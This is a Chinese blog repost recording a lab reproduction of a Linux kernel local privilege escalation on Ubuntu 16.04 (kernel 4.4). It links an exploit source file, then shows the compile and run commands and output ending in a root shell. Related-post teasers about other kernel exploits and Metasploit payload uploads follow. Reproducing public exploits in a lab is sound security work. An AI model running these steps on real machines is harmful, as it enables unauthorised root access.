新版本Ubuntu本地提权漏洞复现

最新推荐文章于 2024-06-11 12:31:59 发布
最新推荐文章于 2024-06-11 12:31:59 发布
阅读量472 收藏
点赞数
文章标签: shell
原文链接:http://www.cnblogs.com/sch01ar/p/8590641.html
版权

该漏洞在老版本中被修复了,但新的版本还存在漏洞

影响范围:Linux Kernel Version 4.14-4.4,Ubuntu/Debian发行版本

Exp下载地址:http://cyseclabs.com/exploits/upstream44.c

测试环境

sch01ar@ubuntu:~$ uname -a
Linux ubuntu 4.4.0-87-generic #110-Ubuntu SMP Tue Jul 18 12:55:35 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

 开始测试

sch01ar@ubuntu:~$ gcc -o test upstream44.c 
sch01ar@ubuntu:~$ chmod -R 777 test
sch01ar@ubuntu:~$ ./test
task_struct = ffff8800338cd400
uidptr = ffff880007530904
spawning root shell
root@ubuntu:~# whoami
root

 复现成功

 

转载于:https://www.cnblogs.com/sch01ar/p/8590641.html

andiao1218
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
nginxdocker镜像(nginx-upstream-check健康检查)
07-16
官方nginx 镜像不带主动健康,本镜像将 nginx_upstream_check健康检查 打包到了镜像中。
Ubuntu16.04.4本地提权漏洞
小北的博客
03-17 6843
Ubuntu16.04.4 本地提权漏洞
VulnHub渗透实战--Bytesec
crispr的博客
02-13 700
Bytesec 0X01 Main Point 1.基于SMB的爆破工具accacheck 2. 用于枚举Windows和Samba主机中的数据工具enum4linux 3. smbmap枚举靶机的共享资源 4. 无线数据包破解工具aircrack-ng的使用 5. PATH环境变量提权 6. fcrackzip暴力破解zip密码 0X02 前期嗅探和端口探测 arp-scan -l #扫描得到...
117.网络安全渗透测试—[权限提升篇15]—[Ubuntu15.04 Metasploit提权]
qwsn
07-08 3635
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。php马: elf马:#msfconsole,开启Metasploit控制台 如下图所示,我们首先上传shellx.php攻击载荷到靶机:
Ubuntu内核提权(CVE-2017-16995)
weixin_68652890的博客
04-15 742
内核提权 环境: 墨者靶场 工具 msf linux-exploit-suggester-master xshell 利用 xshell连接发现是hack权限 上传linux-exploit-suggester.sh到服务器 Possible Exploits:   CVE-2017-16995   CVE-2016-5195 CVE-2016-5195也可以利用 我们这里利用CVE-2017-16995进行提权 影响 CVE-2017-16995 Linux
ubuntu 14.04 切换到root权限的方法
Amy的学习之路
09-13 6578
Ubuntu的默认root密码是随机的,每次开机都会有一个新的root密码。 如果想进入到root权限可以通过以下方法: 1. sudo passo
Ubuntu 16.04.2提权
热门推荐
March
01-29 1万+
系统版本为Ubuntu14.04.5 cat /etc/issue Ubuntu 14.04.5 LTS 查看当前权限 id uid=33(www-data) gid=33(www-data) groups=33(www-data) 网上搜一下有没有exp,然后找到一位博主,下载链接为:https://cyseclabs.com/exploits/upstream44.c 因为用户权限过低,无法在...
ubuntu14.04系统中root权限的获取
qq_43331595的博客
12-09 1626
 作为刚学习Linux的新人,我在获取root权限时候竟然遇到了问题,解决之后特地来总结一下 一般不推荐直接以root身份登入,而是先以用户登入,在用命令切换成root。 一.如果是第一次登入root       首先要设置root密码sudo passwd root (千万不要打成password,我就是这样出错的)       然后会让你设置root密码,输入两遍之后就设置好了。  ...
ubuntu本地内核提权37292.c
08-06
ubuntu本地内核提权
DirtyCow提权漏洞复现(CVE-2016-5195)1
08-08
这个漏洞主要影响的是Linux内核,特别是从2007年的2.6.22版本到修复前的多个稳定版本。 Dirty Cow允许低权限的用户通过一种特定的方式来提升他们的权限,甚至获取root权限,从而对系统造成严重威胁。 1. **环境部署...
ubuntu-39772提权文件
02-14
ubuntu-39772提权文件
ubuntu新版本下载
05-05
国内 下载 ubuntu新版本 ubuntu 历史版本 ubuntu 国内镜像 下载
Ubuntu 10.10 提权教程
02-10
Ubuntu 10.10 提权教程 告诉你Ubuntu应该怎么提权
CVE-2015-1328 Ubuntu 12.04, 14.04, 14.10, 15.04 overlayfs Local Root
weixin_34112181的博客
06-25 338
catalog 0. 引言 1. Description 2. Effected Scope 3. Exploit Analysis 4. Principle Of Vulnerability 5. Patch Fix   0. 引言 新技术、高性能技术的不断发展,越来越提升了操作系统的能力,而近几年出现的虚拟化技术,包括overlayfs虚拟层叠文件系统技术,则为doc...
CVE-2017-16995————Ubuntu本地提权漏洞
Fly_鹏程万里
05-15 4667
前言近期看到了Ubuntu本地提权漏洞所以顺手演示一份,实践一波!漏洞描述Ubuntu是一个以桌面应用为主的开源GNU/Linux操作系统,基于Debian GNU/Linux 。近期有白帽子爆出 ubuntu 的最新版本Ubuntu 16.04)存在本地提权漏洞漏洞编号为CVE-2017-16995。该漏洞存在于调用eBPF bpf(2)的Linux内核系统中,当用户提供恶意BPF程序使eB...
【Linux】——Ubuntu提权(待解决)
给你一半糖
12-31 2274
最近一直在因为项目的需要,需要安装Linux系统,因为自己之前从来没有接触过这方面的内容,从零开始遇到了很多让我自己措手不及的问题,其实关于这个问题现在也还没有解决。     关于如何在Ubuntu提权,按照百度经验上的方法,因为我本身为了省事,选择了永久提权。    第一步:输入sudo gedit /etc/passwd       第二步:将当前用户之后1000:1000两个均改
Ubuntu本地提权漏洞(CVE-2017-16995)复现
锋刃科技的博客
11-27 1739
简介 Linux kernel是美国Linux基金会发布的开源操作系统Linux所使用的内核。 漏洞概述 该漏洞存在于带有 eBPF bpf(2)系统(CONFIG_BPF_SYSCALL)编译支持的Linux内核中,是一个内存任意读写漏洞。该漏洞是由于eBPF验证模块的计算错误产生的。普通用户可以构造特殊的BPF来触发该漏洞,此外恶意攻击者也可以使用该漏洞来进行本地提权操作。 影响版本 Linux Kernel Version 4.14-4.4 (主要影响Debian和Ubuntu发行版
Linux本地提权漏洞复现与检测思路
weixin_46137328的博客
10-15 1810
我做的是linux本地提权漏洞复现。但本地提权漏洞并不像其他web漏洞一样,可以直接pull一个docker镜像就ok了,提权的洞复杂在于配置环境,基本都是在虚拟机里复现,一个镜像的大...
攻破Linxu权限+拓展理解windows权限
最新发布
weixin_72917087的博客
06-11 763
在前面的学习中,对于Linux环境的搭建相信大家不难掌握,对于常用指令的讲解其实也不难理解,我们是否还记得每次输入ll指令后,除了显示当前文件夹下的除隐藏文件外的所有内容,前面还显示了一些数据?比如:那么这些像乱码一样的东西是什么呢?下面我们就将围绕这个话题进行展开,逐步剖析Linux的权限问题!shell命令以及运行原理Linux严格意义上说的是一个操作系统,我们称之为核心(kernel,但我们一般用户,不能直接使用kernel。而是通过kernel的外壳程序,也就是所谓的。
ubuntu 5.15.0-67 内核提权
05-25
在Linux系统中,内核提权漏洞是一种常见的攻击手段之一。 对于Ubuntu 5.15.0-67 内核,如果存在内核漏洞,攻击者可以利用该漏洞来获取系统管理员权限。因此,建议及时更新系统,安装最新的补丁,以确保系统的安全性...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值